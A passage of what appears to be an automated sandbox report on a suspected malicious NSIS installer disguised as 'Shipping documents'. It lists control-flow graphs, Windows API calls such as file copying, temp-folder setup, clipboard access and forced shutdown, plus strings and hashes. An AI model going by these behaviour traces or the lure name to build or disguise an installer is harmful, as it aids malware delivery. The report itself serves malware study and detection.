4034e6-4034f3 call 405ee8 37->43 39->11 40->28 40->41 41->28 42->24 42->44 43->16 55 403725-40372b 44->55 56 40362f-40363f call 4056c4 ExitProcess 44->56 48 403592-40359d call 405960 45->48 49 40360a-403611 call 4038b2 45->49 59 4035d4-4035de 48->59 60 40359f-4035b0 48->60 58 403616 49->58 62 4037a8-4037b0 55->62 63 40372d-40374a call 406252 * 3 55->63 58->44 67 4035e0-4035ee call 405a3b 59->67 68 403645-40365f lstrcatW lstrcmpiW 59->68 64 4035b2-4035b4 60->64 65 4037b2 62->65 66 4037b6-4037ba ExitProcess 62->66 90 403794-40379f ExitWindowsEx 63->90 91 40374c-40374e 63->91 72 4035b6-4035cc 64->72 73 4035ce-4035d2 64->73 65->66 67->44 81 4035f0-403606 call 405ee8 * 2 67->81 68->44 75 403661-403677 CreateDirectoryW SetCurrentDirectoryW 68->75 72->59 72->73 73->59 73->64 78 403684-4036ad call 405ee8 75->78 79 403679-40367f call 405ee8 75->79 89 4036b2-4036ce call 405f0a DeleteFileW 78->89 79->78 81->49 99 4036d0-4036e0 CopyFileW 89->99 100 40370f-403717 89->100 90->62 96 4037a1-4037a3 call 40140b 90->96 91->90 94 403750-403752 91->94 94->90 101 403754-403766 GetCurrentProcess 94->101 96->62 99->100 102 4036e2-403702 call 405d82 call 405f0a call 405663 99->102 100->89 103 403719-403720 call 405d82 100->103 101->90 108 403768-40378a 101->108 102->100 115 403704-40370b CloseHandle 102->115 103->44 108->90 115->100
                                                APIs
                                                • #17.COMCTL32 ref: 00403377
                                                • SetErrorMode.KERNELBASE(00008001), ref: 00403382
                                                • OleInitialize.OLE32(00000000), ref: 00403389
                                                  • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                  • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                  • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1
                                                  • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",00000000), ref: 004033D9
                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",00000020), ref: 00403400
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403509
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351A
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403526
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353A
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403542
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403553
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355B
                                                • DeleteFileW.KERNELBASE(1033), ref: 0040356F
                                                • OleUninitialize.OLE32(?), ref: 0040361F
                                                • ExitProcess.KERNEL32 ref: 0040363F
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",00000000,?), ref: 0040364B
                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Shipping documents 000293994900.exe",00000000,?), ref: 00403657
                                                • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403663
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366A
                                                • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C4
                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\Shipping documents 000293994900.exe,0041FE90,00000001), ref: 004036D8
                                                • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
                                                • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
                                                • ExitProcess.KERNEL32 ref: 004037BA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                • String ID: "C:\Users\user\Desktop\Shipping documents 000293994900.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Shipping documents 000293994900.exe$C:\Users\user\Uploadable\normallnnens$C:\Users\user\Uploadable\normallnnens$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                • API String ID: 4107622049-2404171667
                                                • Opcode ID: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
                                                • Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
                                                • Opcode Fuzzy Hash: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
                                                • Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 116 4052d1-4052ec 117 4052f2-4053bb GetDlgItem * 3 call 404162 call 404a2f GetClientRect GetSystemMetrics SendMessageW * 2 116->117 118 40547d-405484 116->118 141 4053d9-4053dc 117->141 142 4053bd-4053d7 SendMessageW * 2 117->142 120 405486-4054a8 GetDlgItem CreateThread CloseHandle 118->120 121 4054ae-4054bb 118->121 120->121 123 4054d9-4054e3 121->123 124 4054bd-4054c3 121->124 127 4054e5-4054eb 123->127 128 405539-40553d 123->128 125 4054c5-4054d4 ShowWindow * 2 call 404162 124->125 126 4054fe-405507 call 404194 124->126 125->123 138 40550c-405510 126->138 131 405513-405523 ShowWindow 127->131 132 4054ed-4054f9 call 404106 127->132 128->126 135 40553f-405545 128->135 139 405533-405534 call 404106 131->139 140 405525-40552e call 405192 131->140 132->126 135->126 136 405547-40555a SendMessageW 135->136 143 405560-40558b CreatePopupMenu call 405f0a AppendMenuW 136->143 144 40565c-40565e 136->144 139->128 140->139 145 4053ec-405403 call 40412d 141->145 146 4053de-4053ea SendMessageW 141->146 142->141 153 4055a0-4055b5 TrackPopupMenu 143->153 154 40558d-40559d GetWindowRect 143->154 144->138 155 405405-405419 ShowWindow 145->155 156 405439-40545a GetDlgItem SendMessageW 145->156 146->145 153->144 157 4055bb-4055d2 153->157 154->153 158 405428 155->158 159 40541b-405426 ShowWindow 155->159 156->144 160 405460-405478 SendMessageW * 2 156->160 161 4055d7-4055f2 SendMessageW 157->161 162 40542e-405434 call 404162 158->162 159->162 160->144 161->161 163 4055f4-405617 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 161->163 162->156 165 405619-405640 SendMessageW 163->165 165->165 166 405642-405656 GlobalUnlock SetClipboardData CloseClipboard 165->166 166->144
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 00405330
                                                • GetDlgItem.USER32(?,000003EE), ref: 0040533F
                                                • GetClientRect.USER32(?,?), ref: 0040537C
                                                • GetSystemMetrics.USER32(00000015), ref: 00405384
                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A5
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B6
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053C9
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D7
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EA
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540C
                                                • ShowWindow.USER32(?,00000008), ref: 00405420
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405441
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405451
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546A
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405476
                                                • GetDlgItem.USER32(?,000003F8), ref: 0040534E
                                                  • Part of subcall function 00404162: SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
                                                • GetDlgItem.USER32(?,000003EC), ref: 00405493
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005265,00000000), ref: 004054A1
                                                • CloseHandle.KERNELBASE(00000000), ref: 004054A8
                                                • ShowWindow.USER32(00000000), ref: 004054CC
                                                • ShowWindow.USER32(?,00000008), ref: 004054D1
                                                • ShowWindow.USER32(00000008), ref: 0040551B
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040554F
                                                • CreatePopupMenu.USER32 ref: 00405560
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405574
                                                • GetWindowRect.USER32(?,?), ref: 00405594
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AD
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E5
                                                • OpenClipboard.USER32(00000000), ref: 004055F5
                                                • EmptyClipboard.USER32 ref: 004055FB
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405607
                                                • GlobalLock.KERNEL32(00000000), ref: 00405611
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405625
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405645
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405650
                                                • CloseClipboard.USER32 ref: 00405656
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: 4Te${
                                                • API String ID: 590372296-2932814199
                                                • Opcode ID: 87920c7df50ef61a94b7578fd0a9d958e3cbbc70f9eaf2428e155cfd517307d8
                                                • Instruction ID: dd9d9050def2d8c918bbc93d53338e60564b8b02708ef31213df2d5f0290820b
                                                • Opcode Fuzzy Hash: 87920c7df50ef61a94b7578fd0a9d958e3cbbc70f9eaf2428e155cfd517307d8
                                                • Instruction Fuzzy Hash: 51B15C70900209BFDB219F60DD89EAE7B79FB04355F40803AFA05BA1A0C7759E52DF69

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 412 405f0a-405f15 413 405f17-405f26 412->413 414 405f28-405f3e 412->414 413->414 415 405f44-405f51 414->415 416 406156-40615c 414->416 415->416 419 405f57-405f5e 415->419 417 406162-40616d 416->417 418 405f63-405f70 416->418 420 406178-406179 417->420 421 40616f-406173 call 405ee8 417->421 418->417 422 405f76-405f82 418->422 419->416 421->420 424 406143 422->424 425 405f88-405fc4 422->425 426 406151-406154 424->426 427 406145-40614f 424->427 428 4060e4-4060e8 425->428 429 405fca-405fd5 GetVersion 425->429 426->416 427->416 430 4060ea-4060ee 428->430 431 40611d-406121 428->431 432 405fd7-405fdb 429->432 433 405fef 429->433 434 4060f0-4060fc call 405e2f 430->434 435 4060fe-40610b call 405ee8 430->435 437 406130-406141 lstrlenW 431->437 438 406123-40612b call 405f0a 431->438 432->433 439 405fdd-405fe1 432->439 436 405ff6-405ffd 433->436 450 406110-406119 434->450 435->450 442 406002-406004 436->442 443 405fff-406001 436->443 437->416 438->437 439->433 440 405fe3-405fe7 439->440 440->433 446 405fe9-405fed 440->446 448 406040-406043 442->448 449 406006-40602c call 405db5 442->449 443->442 446->436 453 406053-406056 448->453 454 406045-406051 GetSystemDirectoryW 448->454 460 406032-40603b call 405f0a 449->460 461 4060cb-4060cf 449->461 450->437 452 40611b 450->452 456 4060dc-4060e2 call 40617c 452->456 458 4060c1-4060c3 453->458 459 406058-406066 GetWindowsDirectoryW 453->459 457 4060c5-4060c9 454->457 456->437 457->456 457->461 458->457 462 406068-406072 458->462 459->458 460->457 461->456 467 4060d1-4060d7 lstrcatW 461->467 464 406074-406077 462->464 465 40608c-4060a2 SHGetSpecialFolderLocation 462->465 464->465 469 406079-406080 464->469 470 4060a4-4060bb SHGetPathFromIDListW CoTaskMemFree 465->470 471 4060bd 465->471 467->456 473 406088-40608a 469->473 470->457 470->471 471->458 473->457 473->465
                                                APIs
                                                • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,?,004051C9,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000), ref: 00405FCD
                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604B
                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 0040605E
                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
                                                • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060A8
                                                • CoTaskMemFree.OLE32(?), ref: 004060B3
                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,?,004051C9,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000), ref: 00406131
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 900638850-2462294625
                                                • Opcode ID: b2fd181688fdcd7ef8372c6a65a03fcc3ebadb4944a4dbb58e26645ff48e73ec
                                                • Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
                                                • Opcode Fuzzy Hash: b2fd181688fdcd7ef8372c6a65a03fcc3ebadb4944a4dbb58e26645ff48e73ec
                                                • Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 673 405770-405796 call 405a3b 676 405798-4057aa DeleteFileW 673->676 677 4057af-4057b6 673->677 678 40592c-405930 676->678 679 4057b8-4057ba 677->679 680 4057c9-4057d9 call 405ee8 677->680 681 4057c0-4057c3 679->681 682 4058da-4058df 679->682 686 4057e8-4057e9 call 40597f 680->686 687 4057db-4057e6 lstrcatW 680->687 681->680 681->682 682->678 685 4058e1-4058e4 682->685 688 4058e6-4058ec 685->688 689 4058ee-4058f6 call 40622b 685->689 690 4057ee-4057f2 686->690 687->690 688->678 689->678 696 4058f8-40590c call 405933 call 405728 689->696 694 4057f4-4057fc 690->694 695 4057fe-405804 lstrcatW 690->695 694->695 697 405809-405825 lstrlenW FindFirstFileW 694->697 695->697 713 405924-405927 call 405192 696->713 714 40590e-405911 696->714 698 40582b-405833 697->698 699 4058cf-4058d3 697->699 701 405853-405867 call 405ee8 698->701 702 405835-40583d 698->702 699->682 704 4058d5 699->704 715 405869-405871 701->715 716 40587e-405889 call 405728 701->716 705 4058b2-4058c2 FindNextFileW 702->705 706 40583f-405847 702->706 704->682 705->698 712 4058c8-4058c9 FindClose 705->712 706->701 709 405849-405851 706->709 709->701 709->705 712->699 713->678 714->688 717 405913-405922 call 405192 call 405d82 714->717 715->705 718 405873-40587c call 405770 715->718 726 4058aa-4058ad call 405192 716->726 727 40588b-40588e 716->727 717->678 718->705 726->705 730 405890-4058a0 call 405192 call 405d82 727->730 731 4058a2-4058a8 727->731 730->705 731->705
                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 00405799
                                                • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 004057E1
                                                • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 00405804
                                                • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 0040580A
                                                • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 0040581A
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
                                                • FindClose.KERNEL32(00000000), ref: 004058C9
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
                                                • \*.*, xrefs: 004057DB
                                                • "C:\Users\user\Desktop\Shipping documents 000293994900.exe", xrefs: 00405779
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\user\Desktop\Shipping documents 000293994900.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-1630077837
                                                • Opcode ID: e6b69e57f949e1376218aa512c161c788fd1e46ec07f5cd4f65730723e5a92ce
                                                • Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
                                                • Opcode Fuzzy Hash: e6b69e57f949e1376218aa512c161c788fd1e46ec07f5cd4f65730723e5a92ce
                                                • Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                                • Instruction ID: 813cf183cee5dec966489ce4b0e77547af2495df81e7d873cacca3ac907c1fa9
                                                • Opcode Fuzzy Hash: a15f429ebeef9cdec0e0a946c982a144c1606cedce27df8dc8c79f03dc168eda
                                                • Instruction Fuzzy Hash: 95F18770D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00406236
                                                • FindClose.KERNEL32(00000000), ref: 00406242
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: WB
                                                • API String ID: 2295610775-2854515933
                                                • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                • Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
                                                • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                • Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                • LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                • String ID:
                                                • API String ID: 310444273-0
                                                • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                • Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
                                                • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                • Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
